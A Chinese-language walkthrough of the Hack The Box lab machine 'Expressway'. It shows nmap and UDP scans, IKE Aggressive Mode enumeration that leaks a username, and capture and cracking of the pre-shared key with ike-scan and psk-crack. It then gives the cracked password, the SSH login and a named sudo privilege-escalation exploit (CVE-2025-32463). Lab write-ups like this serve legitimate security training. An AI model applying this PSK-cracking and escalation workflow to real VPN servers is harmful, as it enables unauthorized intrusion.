Expressway(HTB Easy)
基本信息
- IP:
10.10.11.87
信息收集
TCP 全端口:
nmap -sT --min-rate 10000 -p- 10.10.11.87
PORT STATE SERVICE
22/tcp open ssh
58925/tcp filtered unknown
服务识别:
nmap -sC -sV -p 22,58925 10.10.11.87
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
58925/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TCP 没有可利用点,改扫 UDP:
nmap -sU 10.10.11.87 -T4
PORT STATE SERVICE
500/udp open isakmp
详细扫描:
nmap -sU -sC -sV -p 500 10.10.11.87
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
扫描结果可能不准,再用专用 UDP 扫描:
.\udpx.exe -t 10.10.11.87 -c 128 -w 1000
2025/09/24 13:00:46 [+] Starting UDP scan on 1 target(s)
2025/09/24 13:01:22 [*] 10.10.11.87:500 (ike)
2025/09/24 13:01:47 [+] Scan completed
User
使用 ike-scan:
ike-scan 10.10.11.87
10.10.11.87 Main Mode Handshake returned HDR=(CKY-R=5e6add4d960efb82) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
目标使用预共享密钥(PSK),尝试 Aggressive Mode:
ike-scan -A 10.10.11.87
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=bed703561d77541a) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
爆出用户名 [email protected],拉取 PSK 再爆破:
ike-scan -A 10.10.11.87 --id=[email protected] -P ike.psk
psk-crack -d /usr/share/wordlists/rockyou.txt ike.psk
得到密钥:freakingrockstarontheroad,SSH 登录成功。
Root
进入普通用户后检查提权:
sudo -l
netstat -tulnp
find / -name "backup" 2>/dev/null
sudo -l 没有可用脚本。桌面上有一个本地提权脚本(CVE-2025-32463),直接运行后提权成功。
至此已经获得机器全部权限。